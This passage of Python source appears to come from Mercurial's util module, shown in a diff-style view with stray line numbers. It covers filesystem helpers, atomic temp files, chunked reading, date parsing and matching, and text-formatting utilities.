                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern uses features re2 doesn't support; use stdlib re
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()
1361
1361
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(directory):
        # map normcased entry name -> on-disk entry name
        return dict((normcase(n), n) for n in os.listdir(directory))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes for the regex character classes below.  The
    # previous code called seps.replace() without binding the result
    # (str.replace is not in-place), so a backslash separator was never
    # actually escaped and '[\/]' only matched '/'.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1404
1404
def getfstype(dirpath):
    '''Get the filesystem type name from a directory (best-effort)

    Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
    '''
    getter = getattr(osutil, 'getfstype', None)
    if getter is None:
        # platform layer can't tell us; report "unsure"
        return None
    return getter(dirpath)
1411
1411
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1 = testfile + ".hgtmp1"
    if os.path.lexists(f1):
        return False
    try:
        posixfile(f1, 'w').close()
    except IOError:
        # couldn't even create the probe file; clean up and give up
        try:
            os.unlink(f1)
        except OSError:
            pass
        return False

    f2 = testfile + ".hgtmp2"
    fd = None
    try:
        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fd = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fd is not None:
            fd.close()
        # always remove both probe files
        for f in (f1, f2):
            try:
                os.unlink(f)
            except OSError:
                pass
1447
1447
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    # altsep may be empty/None on platforms with a single separator
    return pycompat.osaltsep and path.endswith(pycompat.osaltsep)
1452
1452
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need.'''
    # intentionally a thin wrapper; see docstring for the rationale
    return path.split(pycompat.ossep)
1460
1460
def gui():
    '''Are we running in a GUI?'''
    if pycompat.sysplatform == 'darwin':
        if 'SSH_CONNECTION' in encoding.environ:
            # handle SSH access to a box where the user is logged in
            return False
        if getattr(osutil, 'isgui', None):
            # check if a CoreGraphics session is available
            return osutil.isgui()
        # pure build; use a safe default
        return True
    return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1475
1475
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
    os.close(fd)
    # mkstemp creates files with mode 0600, which is usually not what we
    # want.  If the original file already exists, just copy its mode.
    # Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # source vanished; the empty temp file is good enough
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        # don't leave a half-written temp file behind
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
1514
1514
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        # stat: os.stat_result or None (file missing)
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat from a path; missing file yields stat=None."""
        try:
            st = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            st = None
        return cls(st)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an open file object."""
        return cls(os.fstat(fp.fileno()))

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat.st_ctime == old.stat.st_ctime and
                    self.stat.st_mtime == old.stat.st_mtime)
        except AttributeError:
            pass
        try:
            # both "missing" counts as equal
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat.st_ctime == old.stat.st_ctime)
        except AttributeError:
            # either side has no stat: cannot be ambiguous
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # bump mtime by one second, wrapping to stay in 31-bit range
        advanced = (old.stat.st_mtime + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other
1616
1616
1617 class atomictempfile(object):
1617 class atomictempfile(object):
1618 '''writable file object that atomically updates a file
1618 '''writable file object that atomically updates a file
1619
1619
1620 All writes will go to a temporary copy of the original file. Call
1620 All writes will go to a temporary copy of the original file. Call
1621 close() when you are done writing, and atomictempfile will rename
1621 close() when you are done writing, and atomictempfile will rename
1622 the temporary copy to the original name, making the changes
1622 the temporary copy to the original name, making the changes
1623 visible. If the object is destroyed without being closed, all your
1623 visible. If the object is destroyed without being closed, all your
1624 writes are discarded.
1624 writes are discarded.
1625
1625
1626 checkambig argument of constructor is used with filestat, and is
1626 checkambig argument of constructor is used with filestat, and is
1627 useful only if target file is guarded by any lock (e.g. repo.lock
1627 useful only if target file is guarded by any lock (e.g. repo.lock
1628 or repo.wlock).
1628 or repo.wlock).
1629 '''
1629 '''
1630 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1630 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1631 self.__name = name # permanent name
1631 self.__name = name # permanent name
1632 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1632 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1633 createmode=createmode)
1633 createmode=createmode)
1634 self._fp = posixfile(self._tempname, mode)
1634 self._fp = posixfile(self._tempname, mode)
1635 self._checkambig = checkambig
1635 self._checkambig = checkambig
1636
1636
1637 # delegated methods
1637 # delegated methods
1638 self.read = self._fp.read
1638 self.read = self._fp.read
1639 self.write = self._fp.write
1639 self.write = self._fp.write
1640 self.seek = self._fp.seek
1640 self.seek = self._fp.seek
1641 self.tell = self._fp.tell
1641 self.tell = self._fp.tell
1642 self.fileno = self._fp.fileno
1642 self.fileno = self._fp.fileno
1643
1643
    def close(self):
        """Close the temporary file and rename it over the target.

        With checkambig=True, if the rename leaves the new file's stat
        ambiguous relative to the replaced file's (per filestat.isambig),
        the mtime is advanced by one second to disambiguate.
        """
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            # only pay for the extra stat() calls when requested
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)
1658
1658
    def discard(self):
        """Throw away the temporary file, leaving the target untouched."""
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                # best effort: the temp file may already be gone
                pass
            self._fp.close()
1666
1666
    def __del__(self):
        # Guard against a partially-constructed instance: __init__ may
        # have raised before _fp was assigned.
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()
1670
1670
    def __enter__(self):
        # context-manager entry: the object itself is the file-like handle
        return self
1673
1673
    def __exit__(self, exctype, excvalue, traceback):
        # commit (rename into place) on clean exit; drop the temp file
        # if the with-block raised
        if exctype is not None:
            self.discard()
        else:
            self.close()
1679
1679
def unlinkpath(f, ignoremissing=False):
    """Remove file f, then prune any parent directories left empty."""
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    # clean up directories that became empty as a result of the unlink
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
1691
1691
def tryunlink(f):
    """Remove a file if it exists; a missing file is not an error."""
    try:
        unlink(f)
    except OSError as err:
        # a nonexistent path is tolerated; anything else propagates
        if err.errno == errno.ENOENT:
            return
        raise
1699
1699
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            # already there (possibly created by a racing process): done
            return
        if err.errno != errno.ENOENT or not name:
            raise
        # a parent directory is missing: create it recursively, then retry
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the filesystem root without success
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        # only the leaf gets an explicit mode; parents inherit the default
        os.chmod(name, mode)
1727
1727
def readfile(path):
    """Read and return the full contents of *path* as bytes."""
    with open(path, 'rb') as f:
        data = f.read()
    return data
1731
1731
def writefile(path, text):
    """Replace the contents of *path* with *text* (bytes)."""
    with open(path, 'wb') as f:
        f.write(text)
1735
1735
def appendfile(path, text):
    """Append *text* (bytes) to the end of *path*, creating it if needed."""
    with open(path, 'ab') as f:
        f.write(text)
1739
1739
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def _resized(chunks):
            # Break very large chunks (> 1MB) into 256KB pieces so a
            # partial read never has to slice a huge string.
            for piece in chunks:
                if len(piece) <= 2**20:
                    yield piece
                    continue
                for start in range(0, len(piece), 2**18):
                    yield piece[start:start + 2**18]
        self.iter = _resized(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        remaining = l
        pieces = []
        pending = self._queue
        while remaining > 0:
            if not pending:
                # pull roughly 256KB ahead from the source iterator
                budget = 2**18
                for piece in self.iter:
                    pending.append(piece)
                    budget -= len(piece)
                    if budget <= 0:
                        break
                if not pending:
                    # source exhausted: return what we have (may be short)
                    break

            # Consume from the head chunk in place.  We deliberately avoid
            # popleft()/appendleft() round-trips and re-slicing for partial
            # reads; _chunkoffset tracks how much of the head is consumed.
            head = pending[0]
            offset = self._chunkoffset
            avail = len(head) - offset

            if offset == 0 and remaining >= len(head):
                # whole chunk wanted: hand it over without any slicing
                pending.popleft()
                pieces.append(head)
                remaining -= len(head)
            elif remaining >= avail:
                # finish off a partially-consumed chunk
                pending.popleft()
                pieces.append(head[offset:])
                self._chunkoffset = 0
                remaining -= avail
            else:
                # take only part of the current chunk; remember where we are
                pieces.append(head[offset:offset + remaining])
                self._chunkoffset = offset + remaining
                remaining -= avail

        return ''.join(pieces)
1819
1819
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        # never request more than the remaining limit in one read
        nbytes = size if limit is None else min(limit, size)
        data = nbytes and f.read(nbytes)
        if not data:
            return
        if limit:
            limit -= len(data)
        yield data
1840
1840
def makedate(timestamp=None):
    '''Return a unix timestamp (or the current time) as a (unixtime,
    offset) tuple based off the local timezone.'''
    if timestamp is None:
        timestamp = time.time()
    if timestamp < 0:
        hint = _("check your clock")
        raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
    # local-zone offset = UTC wall clock minus local wall clock, in seconds
    d = (datetime.datetime.utcfromtimestamp(timestamp)
         - datetime.datetime.fromtimestamp(timestamp))
    return timestamp, d.days * 86400 + d.seconds
1853
1853
def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
    """represent a (unixtime, offset) tuple as a localized time.
    unixtime is seconds since the epoch, and offset is the time zone's
    number of seconds away from UTC.

    >>> datestr((0, 0))
    'Thu Jan 01 00:00:00 1970 +0000'
    >>> datestr((42, 0))
    'Thu Jan 01 00:00:42 1970 +0000'
    >>> datestr((-42, 0))
    'Wed Dec 31 23:59:18 1969 +0000'
    >>> datestr((0x7fffffff, 0))
    'Tue Jan 19 03:14:07 2038 +0000'
    >>> datestr((-0x80000000, 0))
    'Fri Dec 13 20:45:52 1901 +0000'
    """
    t, tz = date or makedate()
    if "%1" in format or "%2" in format or "%z" in format:
        # expand our private %1/%2 (and %z) directives into "+HHMM" text;
        # %z must be rewritten first so it reuses the %1/%2 expansion
        sign = "-" if tz > 0 else "+"
        q, r = divmod(abs(tz) // 60, 60)
        format = format.replace("%z", "%1%2")
        format = format.replace("%1", "%c%02d" % (sign, q))
        format = format.replace("%2", "%02d" % r)
    # clamp to the signed 32-bit range so strftime works everywhere
    d = min(max(t - tz, -0x80000000), 0x7fffffff)
    # Never use time.gmtime() and datetime.datetime.fromtimestamp()
    # because they use the gmtime() system call which is buggy on Windows
    # for negative values.
    stamp = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
    return encoding.strtolocal(stamp.strftime(encoding.strfromlocal(format)))
1889
1889
def shortdate(date=None):
    """turn (timestamp, tzoff) tuple into iso 8631 date."""
    # delegate to datestr with a fixed YYYY-MM-DD format
    return datestr(date, format='%Y-%m-%d')
1893
1893
def parsetimezone(s):
    """find a trailing timezone, if any, in string, and return a
    (offset, remainder) pair"""

    # named UTC aliases
    if s.endswith(("GMT", "UTC")):
        return 0, s[:-3].rstrip()

    # Unix-style timezones [+-]hhmm
    if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
        sign = 1 if s[-5] == "+" else -1
        hours, minutes = int(s[-4:-2]), int(s[-2:])
        return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()

    # ISO8601 trailing Z
    if s.endswith("Z") and s[-2:-1].isdigit():
        return 0, s[:-1]

    # ISO8601-style [+-]hh:mm
    if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
        s[-5:-3].isdigit() and s[-2:].isdigit()):
        sign = 1 if s[-6] == "+" else -1
        hours, minutes = int(s[-5:-3]), int(s[-2:])
        return -sign * (hours * 60 + minutes) * 60, s[:-6]

    # no recognizable timezone suffix
    return None, s
1921
1921
def strdate(string, format, defaults=None):
    """parse a localized time string and return a (unixtime, offset) tuple.
    if the string cannot be parsed, ValueError is raised.

    defaults maps format-element groups (e.g. "HI", "mb") to a
    (biased, today) pair of fallback values used for elements absent
    from ``format``.
    """
    if defaults is None:
        defaults = {}

    # NOTE: unixtime = localunixtime + offset
    offset, date = parsetimezone(string)

    # add missing elements from defaults
    usenow = False # default to using biased defaults
    for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
        part = pycompat.bytestr(part)
        found = [True for p in part if ("%"+p) in format]
        if not found:
            # element missing from format: append a default value and a
            # matching directive so strptime still sees a complete date
            date += "@" + defaults[part][usenow]
            format += "@%" + part[0]
        else:
            # We've found a specific time element, less specific time
            # elements are relative to today
            usenow = True

    timetuple = time.strptime(encoding.strfromlocal(date),
                              encoding.strfromlocal(format))
    # timegm() treats the tuple as UTC, giving us "local seconds"
    localunixtime = int(calendar.timegm(timetuple))
    if offset is None:
        # local timezone
        unixtime = int(time.mktime(timetuple))
        offset = unixtime - localunixtime
    else:
        unixtime = localunixtime + offset
    return unixtime, offset
1954
1954
def parsedate(date, formats=None, bias=None):
    """parse a localized date/time and return a (unixtime, offset) tuple.

    The date may be a "unixtime offset" string or in one of the specified
    formats. If the date already is a (unixtime, offset) tuple, it is returned.

    >>> parsedate(' today ') == parsedate(\
                                  datetime.date.today().strftime('%b %d'))
    True
    >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
                                               datetime.timedelta(days=1)\
                                              ).strftime('%b %d'))
    True
    >>> now, tz = makedate()
    >>> strnow, strtz = parsedate('now')
    >>> (strnow - now) < 1
    True
    >>> tz == strtz
    True
    """
    if bias is None:
        bias = {}
    if not date:
        return 0, 0
    if isinstance(date, tuple) and len(date) == 2:
        # already parsed
        return date
    if not formats:
        formats = defaultdateformats
    date = date.strip()

    # symbolic dates
    if date == 'now' or date == _('now'):
        return makedate()
    if date == 'today' or date == _('today'):
        date = datetime.date.today().strftime('%b %d')
    elif date == 'yesterday' or date == _('yesterday'):
        date = (datetime.date.today() -
                datetime.timedelta(days=1)).strftime('%b %d')

    try:
        # fast path: "unixtime offset"
        when, offset = map(int, date.split(' '))
    except ValueError:
        # fill out defaults
        now = makedate()
        defaults = {}
        for part in ("d", "mb", "yY", "HI", "M", "S"):
            # this piece is for rounding the specific end of unknowns
            b = bias.get(part)
            if b is None:
                if part[0:1] in "HMS":
                    b = "00"
                else:
                    b = "0"

            # this piece is for matching the generic end to today's date
            n = datestr(now, "%" + part[0:1])

            defaults[part] = (b, n)

        # try each candidate format until one parses
        for format in formats:
            try:
                when, offset = strdate(date, format, defaults)
            except (ValueError, OverflowError):
                pass
            else:
                break
        else:
            raise error.ParseError(_('invalid date: %r') % date)
    # validate explicit (probably user-specified) date and
    # time zone offset. values must fit in signed 32 bits for
    # current 32-bit linux runtimes. timezones go from UTC-12
    # to UTC+14
    if when < -0x80000000 or when > 0x7fffffff:
        raise error.ParseError(_('date exceeds 32 bits: %d') % when)
    if offset < -50400 or offset > 43200:
        raise error.ParseError(_('impossible time zone offset: %d') % offset)
    return when, offset
2031
2031
def matchdate(date):
    """Return a function that matches a given date match specifier

    Formats include:

    '{date}' match a given date to the accuracy provided

    '<{date}' on or before a given date

    '>{date}' on or after a given date

    >>> p1 = parsedate("10:29:59")
    >>> p2 = parsedate("10:30:00")
    >>> p3 = parsedate("10:30:59")
    >>> p4 = parsedate("10:31:00")
    >>> p5 = parsedate("Sep 15 10:30:00 1999")
    >>> f = matchdate("10:30")
    >>> f(p1[0])
    False
    >>> f(p2[0])
    True
    >>> f(p3[0])
    True
    >>> f(p4[0])
    False
    >>> f(p5[0])
    False
    """

    def lower(date):
        # earliest timestamp matching the spec (missing fields biased low)
        d = {'mb': "1", 'd': "1"}
        return parsedate(date, extendeddateformats, d)[0]

    def upper(date):
        # latest timestamp matching the spec (missing fields biased high);
        # probe month lengths 31, 30, 29, falling back to 28
        d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
        for days in ("31", "30", "29"):
            try:
                d["d"] = days
                return parsedate(date, extendeddateformats, d)[0]
            except Abort:
                pass
        d["d"] = "28"
        return parsedate(date, extendeddateformats, d)[0]

    date = date.strip()

    if not date:
        raise Abort(_("dates cannot consist entirely of whitespace"))
    elif date[0] == "<":
        # on or before
        if not date[1:]:
            raise Abort(_("invalid day spec, use '<DATE'"))
        when = upper(date[1:])
        return lambda x: x <= when
    elif date[0] == ">":
        # on or after
        if not date[1:]:
            raise Abort(_("invalid day spec, use '>DATE'"))
        when = lower(date[1:])
        return lambda x: x >= when
    elif date[0] == "-":
        # within the last N days
        try:
            days = int(date[1:])
        except ValueError:
            raise Abort(_("invalid day spec: %s") % date[1:])
        if days < 0:
            raise Abort(_("%s must be nonnegative (see 'hg help dates')")
                        % date[1:])
        when = makedate()[0] - days * 3600 * 24
        return lambda x: x >= when
    elif " to " in date:
        # explicit inclusive range
        a, b = date.split(" to ")
        start, stop = lower(a), upper(b)
        return lambda x: x >= start and x <= stop
    else:
        # a bare date matches the whole span it describes
        start, stop = lower(date), upper(date)
        return lambda x: x >= start and x <= stop
2107
2107
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test('abcdefg', 'abc', 'def', 'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test('literal:re:foobar', 'foobar', 're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        try:
            regex = remod.compile(pattern, 0 if casesensitive else remod.I)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search

    # explicit 'literal:' prefix is stripped; anything else is taken verbatim
    if pattern.startswith('literal:'):
        pattern = pattern[8:]

    if casesensitive:
        match = pattern.__eq__
    else:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2166
2166
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # strip any domain part first
    user = user.split('@', 1)[0]
    # keep only what follows an opening angle bracket, if present
    lt = user.find('<')
    if lt >= 0:
        user = user[lt + 1:]
    # then truncate at the first space and the first dot
    user = user.split(' ', 1)[0]
    user = user.split('.', 1)[0]
    return user
2182
2182
def emailuser(user):
    """Return the user portion of an email address."""
    # drop the domain part, then anything up to and including '<'
    at = user.find('@')
    if at != -1:
        user = user[:at]
    lt = user.find('<')
    if lt != -1:
        user = user[lt + 1:]
    return user
2192
2192
def email(author):
    '''get email of author.'''
    # slice between '<' and '>'; either bracket may be absent, in which
    # case find() returning -1 yields start 0 / end None respectively
    close = author.find('>')
    end = close if close != -1 else None
    return author[author.find('<') + 1:end]
2199
2199
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    # delegates to encoding.trim — presumably column-aware rather than
    # byte-based, per its signature; confirm in the encoding module
    return encoding.trim(text, maxlength, ellipsis='...')
2203
2203
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        magnitude = abs(count)
        # pick the first (largest-unit) entry whose threshold is reached
        for multiplier, divisor, fmt in unittable:
            if magnitude >= divisor * multiplier:
                return fmt % (count / float(divisor))
        # nothing matched: render with the smallest unit's format
        return unittable[-1][2] % count

    return go
2214
2214
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    # reject an empty-or-reversed range, then a non-1-based start
    if fromline > toline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline
2235
2235
# Human-readable byte counts: use the largest unit that leaves at least
# one integer digit; precision shrinks as the magnitude grows.
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2248
2248
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    # normalize every line ending in s to a single LF
    return _eolre.sub('\n', s)

def tocrlf(s):
    # normalize every line ending in s to CRLF
    return _eolre.sub('\r\n', s)
2259
2259
# Alias the EOL converters so callers can request "native" line endings
# without testing the platform themselves; on LF platforms the
# conversions are no-ops.
if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
2266
2266
def escapestr(s):
    """Return s with special characters backslash-escaped."""
    # codecs.escape_encode is the C routine behind
    # s.encode('string_escape'); calling it directly also works on
    # Python 3, where the 'string_escape' codec name was removed
    encoded, _consumed = codecs.escape_encode(s)
    return encoded
2271
2271
def unescapestr(s):
    """Inverse of escapestr(): decode backslash escapes in s."""
    decoded, _consumed = codecs.escape_decode(s)
    return decoded
2274
2274
def uirepr(s):
    """repr() of s with doubled backslashes collapsed.

    Avoids the double backslash that repr() produces for Windows paths.
    """
    raw = repr(s)
    return raw.replace('\\\\', '\\')
2278
2278
# delay import of textwrap
def MBTextWrapper(**kwargs):
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each characters.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires use decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # Split ucstr into (head, tail) so that head occupies at most
            # space_left display columns (per encoding.ucolwidth).
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                # break the oversized chunk at a column boundary
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                # cannot break: put the whole chunk on its own line
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chucks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
